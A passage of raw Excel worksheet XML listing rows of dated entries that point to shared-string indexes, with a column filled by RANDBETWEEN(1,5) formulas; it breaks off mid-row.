    <row r="6649" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6649" s="1">
        <v>43431.614328703705</v>
      </c>
      <c r="C6649" t="s">
        <v>10</v>
      </c>
      <c r="D6649" t="s">
        <v>151</v>
      </c>
      <c r="E6649" s="2" t="s">
        <v>5918</v>
      </c>
      <c r="F6649">
        <f t="shared" ca="1" si="103"/>
        <v>1</v>
      </c>
    </row>
    <row r="6650" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6650" s="1">
        <v>43431.607569444444</v>
      </c>
      <c r="C6650" t="s">
        <v>10</v>
      </c>
      <c r="D6650" t="s">
        <v>263</v>
      </c>
      <c r="E6650" t="s">
        <v>5919</v>
      </c>
      <c r="F6650">
        <f t="shared" ca="1" si="103"/>
        <v>3</v>
      </c>
    </row>
    <row r="6651" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6651" s="1">
        <v>43431.59579861111</v>
      </c>
      <c r="C6651" t="s">
        <v>260</v>
      </c>
      <c r="F6651">
        <f t="shared" ca="1" si="103"/>
        <v>4</v>
      </c>
    </row>
    <row r="6652" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6652" s="1">
        <v>43431.588784722226</v>
      </c>
      <c r="C6652" t="s">
        <v>10</v>
      </c>
      <c r="E6652" t="s">
        <v>5920</v>
      </c>
      <c r="F6652">
        <f t="shared" ca="1" si="103"/>
        <v>2</v>
      </c>
    </row>
    <row r="6653" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6653" s="1">
        <v>43431.547326388885</v>
      </c>
      <c r="C6653" t="s">
        <v>10</v>
      </c>
      <c r="D6653" t="s">
        <v>80</v>
      </c>
      <c r="E6653" s="2" t="s">
        <v>5921</v>
      </c>
      <c r="F6653">
        <f t="shared" ca="1" si="103"/>
        <v>1</v>
      </c>
    </row>
    <row r="6654" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6654" s="1">
        <v>43431.547291666669</v>
      </c>
      <c r="C6654" t="s">
        <v>10</v>
      </c>
      <c r="D6654" t="s">
        <v>80</v>
      </c>
      <c r="E6654" s="2" t="s">
        <v>5921</v>
      </c>
      <c r="F6654">
        <f t="shared" ca="1" si="103"/>
        <v>2</v>
      </c>
    </row>
    <row r="6655" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6655" s="1">
        <v>43431.516076388885</v>
      </c>
      <c r="C6655" t="s">
        <v>60</v>
      </c>
      <c r="E6655" t="s">
        <v>5922</v>
      </c>
      <c r="F6655">
        <f t="shared" ca="1" si="103"/>
        <v>1</v>
      </c>
    </row>
    <row r="6656" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6656" s="1">
        <v>43431.510011574072</v>
      </c>
      <c r="C6656" t="s">
        <v>10</v>
      </c>
      <c r="D6656" t="s">
        <v>17</v>
      </c>
      <c r="E6656" t="s">
        <v>5923</v>
      </c>
      <c r="F6656">
        <f t="shared" ca="1" si="103"/>
        <v>2</v>
      </c>
    </row>
    <row r="6657" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6657" s="1">
        <v>43431.508738425924</v>
      </c>
      <c r="C6657" t="s">
        <v>10</v>
      </c>
      <c r="D6657" t="s">
        <v>163</v>
      </c>
      <c r="E6657" t="s">
        <v>5924</v>
      </c>
      <c r="F6657">
        <f t="shared" ca="1" si="103"/>
        <v>3</v>
      </c>
    </row>
    <row r="6658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6658" s="1">
        <v>43431.500057870369</v>
      </c>
      <c r="C6658" t="s">
        <v>10</v>
      </c>
      <c r="D6658" t="s">
        <v>20</v>
      </c>
      <c r="E6658" t="s">
        <v>5925</v>
      </c>
      <c r="F6658">
        <f t="shared" ref="F6658:F6721" ca="1" si="104">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="6659" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6659" s="1">
        <v>43431.465509259258</v>
      </c>
      <c r="C6659" t="s">
        <v>10</v>
      </c>
      <c r="D6659" t="s">
        <v>192</v>
      </c>
      <c r="E6659" t="s">
        <v>5926</v>
      </c>
      <c r="F6659">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6660" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6660" s="1">
        <v>43431.462789351855</v>
      </c>
      <c r="C6660" t="s">
        <v>10</v>
      </c>
      <c r="D6660" t="s">
        <v>17</v>
      </c>
      <c r="E6660" t="s">
        <v>5927</v>
      </c>
      <c r="F6660">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6661" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A6661" s="1">
        <v>43431.449675925927</v>
      </c>
      <c r="C6661" t="s">
        <v>71</v>
      </c>
      <c r="D6661" t="s">
        <v>312</v>
      </c>
      <c r="E6661" s="2" t="s">
        <v>5928</v>
      </c>
      <c r="F6661">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6662" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6662" s="1">
        <v>43431.443958333337</v>
      </c>
      <c r="C6662" t="s">
        <v>10</v>
      </c>
      <c r="D6662" t="s">
        <v>6</v>
      </c>
      <c r="E6662" t="s">
        <v>5929</v>
      </c>
      <c r="F6662">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6663" s="1">
        <v>43431.431909722225</v>
      </c>
      <c r="C6663" t="s">
        <v>10</v>
      </c>
      <c r="D6663" t="s">
        <v>290</v>
      </c>
      <c r="E6663" t="s">
        <v>5930</v>
      </c>
      <c r="F6663">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6664" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6664" s="1">
        <v>43431.425844907404</v>
      </c>
      <c r="C6664" t="s">
        <v>10</v>
      </c>
      <c r="D6664" t="s">
        <v>20</v>
      </c>
      <c r="E6664" t="s">
        <v>5931</v>
      </c>
      <c r="F6664">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6665" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6665" s="1">
        <v>43431.423101851855</v>
      </c>
      <c r="C6665" t="s">
        <v>10</v>
      </c>
      <c r="D6665" t="s">
        <v>20</v>
      </c>
      <c r="E6665" t="s">
        <v>5932</v>
      </c>
      <c r="F6665">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6666" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6666" s="1">
        <v>43431.422326388885</v>
      </c>
      <c r="C6666" t="s">
        <v>63</v>
      </c>
      <c r="E6666" t="s">
        <v>5933</v>
      </c>
      <c r="F6666">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6667" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6667" s="1">
        <v>43431.393379629626</v>
      </c>
      <c r="C6667" t="s">
        <v>65</v>
      </c>
      <c r="E6667" s="2" t="s">
        <v>5934</v>
      </c>
      <c r="F6667">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6668" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6668" s="1">
        <v>43431.379201388889</v>
      </c>
      <c r="C6668" t="s">
        <v>6</v>
      </c>
      <c r="D6668" t="s">
        <v>25</v>
      </c>
      <c r="E6668" t="s">
        <v>5935</v>
      </c>
      <c r="F6668">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6669" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A6669" s="1">
        <v>43431.359953703701</v>
      </c>
      <c r="C6669" t="s">
        <v>10</v>
      </c>
      <c r="D6669" t="s">
        <v>192</v>
      </c>
      <c r="E6669" s="2" t="s">
        <v>5936</v>
      </c>
      <c r="F6669">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6670" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6670" s="1">
        <v>43431.353796296295</v>
      </c>
      <c r="C6670" t="s">
        <v>3443</v>
      </c>
      <c r="D6670" t="s">
        <v>222</v>
      </c>
      <c r="E6670" t="s">
        <v>5937</v>
      </c>
      <c r="F6670">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6671" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6671" s="1">
        <v>43431.35361111111</v>
      </c>
      <c r="C6671" t="s">
        <v>686</v>
      </c>
      <c r="E6671" s="2" t="s">
        <v>5938</v>
      </c>
      <c r="F6671">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6672" s="1">
        <v>43431.340138888889</v>
      </c>
      <c r="C6672" t="s">
        <v>48</v>
      </c>
      <c r="E6672" t="s">
        <v>5939</v>
      </c>
      <c r="F6672">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6673" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6673" s="1">
        <v>43431.334340277775</v>
      </c>
      <c r="C6673" t="s">
        <v>430</v>
      </c>
      <c r="D6673" t="s">
        <v>312</v>
      </c>
      <c r="E6673" t="s">
        <v>5940</v>
      </c>
      <c r="F6673">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6674" s="1">
        <v>43431.292650462965</v>
      </c>
      <c r="C6674" t="s">
        <v>344</v>
      </c>
      <c r="E6674" t="s">
        <v>5941</v>
      </c>
      <c r="F6674">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6675" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6675" s="1">
        <v>43431.289212962962</v>
      </c>
      <c r="C6675" t="s">
        <v>10</v>
      </c>
      <c r="D6675" t="s">
        <v>80</v>
      </c>
      <c r="E6675" s="2" t="s">
        <v>5942</v>
      </c>
      <c r="F6675">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6676" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6676" s="1">
        <v>43431.287187499998</v>
      </c>
      <c r="C6676" t="s">
        <v>3443</v>
      </c>
      <c r="E6676" t="s">
        <v>5943</v>
      </c>
      <c r="F6676">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6677" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6677" s="1">
        <v>43431.286296296297</v>
      </c>
      <c r="C6677" t="s">
        <v>60</v>
      </c>
      <c r="E6677" s="2" t="s">
        <v>5944</v>
      </c>
      <c r="F6677">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6678" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6678" s="1">
        <v>43431.272800925923</v>
      </c>
      <c r="C6678" t="s">
        <v>41</v>
      </c>
      <c r="D6678" t="s">
        <v>312</v>
      </c>
      <c r="E6678" t="s">
        <v>5945</v>
      </c>
      <c r="F6678">
        <f t="shared" ca="1" si="104"/>
        <v>2</v>
      </c>
    </row>
    <row r="6679" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6679" s="1">
        <v>43431.249537037038</v>
      </c>
      <c r="C6679" t="s">
        <v>41</v>
      </c>
      <c r="E6679" s="2" t="s">
        <v>5946</v>
      </c>
      <c r="F6679">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6680" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6680" s="1">
        <v>43431.238333333335</v>
      </c>
      <c r="C6680" t="s">
        <v>686</v>
      </c>
      <c r="E6680" t="s">
        <v>5947</v>
      </c>
      <c r="F6680">
        <f t="shared" ca="1" si="104"/>
        <v>2</v>
      </c>
    </row>
    <row r="6681" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6681" s="1">
        <v>43431.223460648151</v>
      </c>
      <c r="C6681" t="s">
        <v>71</v>
      </c>
      <c r="E6681" t="s">
        <v>5948</v>
      </c>
      <c r="F6681">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6682" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6682" s="1">
        <v>43431.22314814815</v>
      </c>
      <c r="C6682" t="s">
        <v>708</v>
      </c>
      <c r="D6682" t="s">
        <v>312</v>
      </c>
      <c r="E6682" t="s">
        <v>4234</v>
      </c>
      <c r="F6682">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6683" s="1">
        <v>43431.208391203705</v>
      </c>
      <c r="C6683" t="s">
        <v>559</v>
      </c>
      <c r="E6683" t="s">
        <v>5949</v>
      </c>
      <c r="F6683">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6684" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6684" s="1">
        <v>43431.197187500002</v>
      </c>
      <c r="C6684" t="s">
        <v>563</v>
      </c>
      <c r="E6684" s="2" t="s">
        <v>5950</v>
      </c>
      <c r="F6684">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6685" s="1">
        <v>43431.18546296296</v>
      </c>
      <c r="C6685" t="s">
        <v>71</v>
      </c>
      <c r="E6685" t="s">
        <v>5951</v>
      </c>
      <c r="F6685">
        <f t="shared" ca="1" si="104"/>
        <v>2</v>
      </c>
    </row>
    <row r="6686" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6686" s="1">
        <v>43431.144490740742</v>
      </c>
      <c r="C6686" t="s">
        <v>71</v>
      </c>
      <c r="E6686" t="s">
        <v>5952</v>
      </c>
      <c r="F6686">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6687" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6687" s="1">
        <v>43431.09070601852</v>
      </c>
      <c r="C6687" t="s">
        <v>229</v>
      </c>
      <c r="E6687" s="2" t="s">
        <v>5953</v>
      </c>
      <c r="F6687">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6688" s="1">
        <v>43431.068356481483</v>
      </c>
      <c r="C6688" t="s">
        <v>41</v>
      </c>
      <c r="E6688" t="s">
        <v>5954</v>
      </c>
      <c r="F6688">
        <f t="shared" ca="1" si="104"/>
        <v>2</v>
      </c>
    </row>
    <row r="6689" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A6689" s="1">
        <v>43430.928113425929</v>
      </c>
      <c r="C6689" t="s">
        <v>10</v>
      </c>
      <c r="D6689" t="s">
        <v>11</v>
      </c>
      <c r="E6689" s="2" t="s">
        <v>5955</v>
      </c>
      <c r="F6689">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6690" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6690" s="1">
        <v>43430.903587962966</v>
      </c>
      <c r="C6690" t="s">
        <v>2188</v>
      </c>
      <c r="D6690" t="s">
        <v>67</v>
      </c>
      <c r="E6690" t="s">
        <v>5956</v>
      </c>
      <c r="F6690">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6691" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6691" s="1">
        <v>43430.782754629632</v>
      </c>
      <c r="C6691" t="s">
        <v>10</v>
      </c>
      <c r="D6691" t="s">
        <v>6</v>
      </c>
      <c r="E6691" t="s">
        <v>5957</v>
      </c>
      <c r="F6691">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6692" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6692" s="1">
        <v>43430.770729166667</v>
      </c>
      <c r="C6692" t="s">
        <v>86</v>
      </c>
      <c r="E6692" s="2" t="s">
        <v>5958</v>
      </c>
      <c r="F6692">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6693" s="1">
        <v>43430.769421296296</v>
      </c>
      <c r="C6693" t="s">
        <v>86</v>
      </c>
      <c r="F6693">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6694" s="1">
        <v>43430.657604166663</v>
      </c>
      <c r="C6694" t="s">
        <v>10</v>
      </c>
      <c r="D6694" t="s">
        <v>6</v>
      </c>
      <c r="E6694" t="s">
        <v>5959</v>
      </c>
      <c r="F6694">
        <f t="shared" ca="1" si="104"/>
        <v>2</v>
      </c>
    </row>
    <row r="6695" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6695" s="1">
        <v>43430.641875000001</v>
      </c>
      <c r="C6695" t="s">
        <v>10</v>
      </c>
      <c r="D6695" t="s">
        <v>39</v>
      </c>
      <c r="E6695" t="s">
        <v>5960</v>
      </c>
      <c r="F6695">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6696" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6696" s="1">
        <v>43430.639317129629</v>
      </c>
      <c r="C6696" t="s">
        <v>3515</v>
      </c>
      <c r="E6696" s="2" t="s">
        <v>5961</v>
      </c>
      <c r="F6696">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6697" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6697" s="1">
        <v>43430.639293981483</v>
      </c>
      <c r="C6697" t="s">
        <v>3515</v>
      </c>
      <c r="E6697" s="2" t="s">
        <v>5961</v>
      </c>
      <c r="F6697">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6698" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6698" s="1">
        <v>43430.6330787037</v>
      </c>
      <c r="C6698" t="s">
        <v>10</v>
      </c>
      <c r="D6698" t="s">
        <v>46</v>
      </c>
      <c r="E6698" s="2" t="s">
        <v>5962</v>
      </c>
      <c r="F6698">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6699" s="1">
        <v>43430.628136574072</v>
      </c>
      <c r="C6699" t="s">
        <v>10</v>
      </c>
      <c r="D6699" t="s">
        <v>11</v>
      </c>
      <c r="E6699" t="s">
        <v>5963</v>
      </c>
      <c r="F6699">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6700" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A6700" s="1">
        <v>43430.623530092591</v>
      </c>
      <c r="C6700" t="s">
        <v>10</v>
      </c>
      <c r="D6700" t="s">
        <v>11</v>
      </c>
      <c r="E6700" s="2" t="s">
        <v>5964</v>
      </c>
      <c r="F6700">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6701" s="1">
        <v>43430.612534722219</v>
      </c>
      <c r="C6701" t="s">
        <v>6</v>
      </c>
      <c r="D6701" t="s">
        <v>194</v>
      </c>
      <c r="E6701" t="s">
        <v>5965</v>
      </c>
      <c r="F6701">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6702" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A6702" s="1">
        <v>43430.608773148146</v>
      </c>
      <c r="C6702" t="s">
        <v>10</v>
      </c>
      <c r="D6702" t="s">
        <v>23</v>
      </c>
      <c r="E6702" s="2" t="s">
        <v>5966</v>
      </c>
      <c r="F6702">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6703" s="1">
        <v>43430.598900462966</v>
      </c>
      <c r="C6703" t="s">
        <v>10</v>
      </c>
      <c r="D6703" t="s">
        <v>23</v>
      </c>
      <c r="E6703" t="s">
        <v>5967</v>
      </c>
      <c r="F6703">
        <f t="shared" ca="1" si="104"/>
        <v>2</v>
      </c>
    </row>
    <row r="6704" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6704" s="1">
        <v>43430.591851851852</v>
      </c>
      <c r="C6704" t="s">
        <v>10</v>
      </c>
      <c r="D6704" t="s">
        <v>112</v>
      </c>
      <c r="E6704" t="s">
        <v>5968</v>
      </c>
      <c r="F6704">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6705" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6705" s="1">
        <v>43430.58189814815</v>
      </c>
      <c r="C6705" t="s">
        <v>10</v>
      </c>
      <c r="D6705" t="s">
        <v>381</v>
      </c>
      <c r="E6705" t="s">
        <v>5969</v>
      </c>
      <c r="F6705">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6706" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6706" s="1">
        <v>43430.564143518517</v>
      </c>
      <c r="C6706" t="s">
        <v>318</v>
      </c>
      <c r="E6706" t="s">
        <v>298</v>
      </c>
      <c r="F6706">
        <f t="shared" ca="1" si="104"/>
        <v>1</v>
      </c>
    </row>
    <row r="6707" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6707" s="1">
        <v>43430.564120370371</v>
      </c>
      <c r="C6707" t="s">
        <v>318</v>
      </c>
      <c r="E6707" t="s">
        <v>298</v>
      </c>
      <c r="F6707">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6708" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6708" s="1">
        <v>43430.546956018516</v>
      </c>
      <c r="C6708" t="s">
        <v>10</v>
      </c>
      <c r="D6708" t="s">
        <v>381</v>
      </c>
      <c r="E6708" t="s">
        <v>5970</v>
      </c>
      <c r="F6708">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6709" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6709" s="1">
        <v>43430.536770833336</v>
      </c>
      <c r="C6709" t="s">
        <v>10</v>
      </c>
      <c r="D6709" t="s">
        <v>178</v>
      </c>
      <c r="E6709" t="s">
        <v>5971</v>
      </c>
      <c r="F6709">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6710" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6710" s="1">
        <v>43430.532673611109</v>
      </c>
      <c r="C6710" t="s">
        <v>10</v>
      </c>
      <c r="D6710" t="s">
        <v>80</v>
      </c>
      <c r="E6710" s="2" t="s">
        <v>5972</v>
      </c>
      <c r="F6710">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6711" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6711" s="1">
        <v>43430.53266203704</v>
      </c>
      <c r="C6711" t="s">
        <v>10</v>
      </c>
      <c r="D6711" t="s">
        <v>80</v>
      </c>
      <c r="E6711" s="2" t="s">
        <v>5972</v>
      </c>
      <c r="F6711">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6712" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6712" s="1">
        <v>43430.523761574077</v>
      </c>
      <c r="C6712" t="s">
        <v>10</v>
      </c>
      <c r="D6712" t="s">
        <v>192</v>
      </c>
      <c r="E6712" t="s">
        <v>5973</v>
      </c>
      <c r="F6712">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6713" s="1">
        <v>43430.518229166664</v>
      </c>
      <c r="C6713" t="s">
        <v>10</v>
      </c>
      <c r="D6713" t="s">
        <v>271</v>
      </c>
      <c r="E6713" t="s">
        <v>5974</v>
      </c>
      <c r="F6713">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6714" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6714" s="1">
        <v>43430.490162037036</v>
      </c>
      <c r="C6714" t="s">
        <v>10</v>
      </c>
      <c r="D6714" t="s">
        <v>33</v>
      </c>
      <c r="E6714" s="2" t="s">
        <v>5975</v>
      </c>
      <c r="F6714">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6715" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6715" s="1">
        <v>43430.485312500001</v>
      </c>
      <c r="C6715" t="s">
        <v>10</v>
      </c>
      <c r="D6715" t="s">
        <v>14</v>
      </c>
      <c r="E6715" s="2" t="s">
        <v>5976</v>
      </c>
      <c r="F6715">
        <f t="shared" ca="1" si="104"/>
        <v>2</v>
      </c>
    </row>
    <row r="6716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6716" s="1">
        <v>43430.465960648151</v>
      </c>
      <c r="C6716" t="s">
        <v>6</v>
      </c>
      <c r="D6716" t="s">
        <v>25</v>
      </c>
      <c r="E6716" t="s">
        <v>5977</v>
      </c>
      <c r="F6716">
        <f t="shared" ca="1" si="104"/>
        <v>3</v>
      </c>
    </row>
    <row r="6717" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A6717" s="1">
        <v>43430.464432870373</v>
      </c>
      <c r="C6717" t="s">
        <v>10</v>
      </c>
      <c r="D6717" t="s">
        <v>6</v>
      </c>
      <c r="E6717" s="2" t="s">
        <v>5978</v>
      </c>
      <c r="F6717">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6718" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6718" s="1">
        <v>43430.447905092595</v>
      </c>
      <c r="C6718" t="s">
        <v>41</v>
      </c>
      <c r="E6718" t="s">
        <v>5979</v>
      </c>
      <c r="F6718">
        <f t="shared" ca="1" si="104"/>
        <v>2</v>
      </c>
    </row>
    <row r="6719" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6719" s="1">
        <v>43430.433310185188</v>
      </c>
      <c r="C6719" t="s">
        <v>65</v>
      </c>
      <c r="E6719" s="2" t="s">
        <v>5980</v>
      </c>
      <c r="F6719">
        <f t="shared" ca="1" si="104"/>
        <v>4</v>
      </c>
    </row>
    <row r="6720" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6720" s="1">
        <v>43430.432939814818</v>
      </c>
      <c r="C6720" t="s">
        <v>229</v>
      </c>
      <c r="E6720" t="s">
        <v>5981</v>
      </c>
      <c r="F6720">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6721" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6721" s="1">
        <v>43430.429780092592</v>
      </c>
      <c r="C6721" t="s">
        <v>454</v>
      </c>
      <c r="E6721" s="2" t="s">
        <v>5982</v>
      </c>
      <c r="F6721">
        <f t="shared" ca="1" si="104"/>
        <v>5</v>
      </c>
    </row>
    <row r="6722" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6722" s="1">
        <v>43430.423252314817</v>
      </c>
      <c r="C6722" t="s">
        <v>71</v>
      </c>
      <c r="E6722" s="2" t="s">
        <v>5983</v>
      </c>
      <c r="F6722">
        <f t="shared" ref="F6722:F6785" ca="1" si="105">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="6723" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6723" s="1">
        <v>43430.417164351849</v>
      </c>
      <c r="C6723" t="s">
        <v>226</v>
      </c>
      <c r="E6723" t="s">
        <v>5984</v>
      </c>
      <c r="F6723">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6724" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6724" s="1">
        <v>43430.377974537034</v>
      </c>
      <c r="C6724" t="s">
        <v>48</v>
      </c>
      <c r="E6724" s="2" t="s">
        <v>5985</v>
      </c>
      <c r="F6724">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6725" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6725" s="1">
        <v>43430.37</v>
      </c>
      <c r="C6725" t="s">
        <v>731</v>
      </c>
      <c r="E6725" t="s">
        <v>5986</v>
      </c>
      <c r="F6725">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6726" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6726" s="1">
        <v>43430.363310185188</v>
      </c>
      <c r="C6726" t="s">
        <v>65</v>
      </c>
      <c r="E6726" s="2" t="s">
        <v>5987</v>
      </c>
      <c r="F6726">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6727" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6727" s="1">
        <v>43430.354780092595</v>
      </c>
      <c r="C6727" t="s">
        <v>65</v>
      </c>
      <c r="E6727" s="2" t="s">
        <v>5988</v>
      </c>
      <c r="F6727">
        <f t="shared" ca="1" si="105"/>
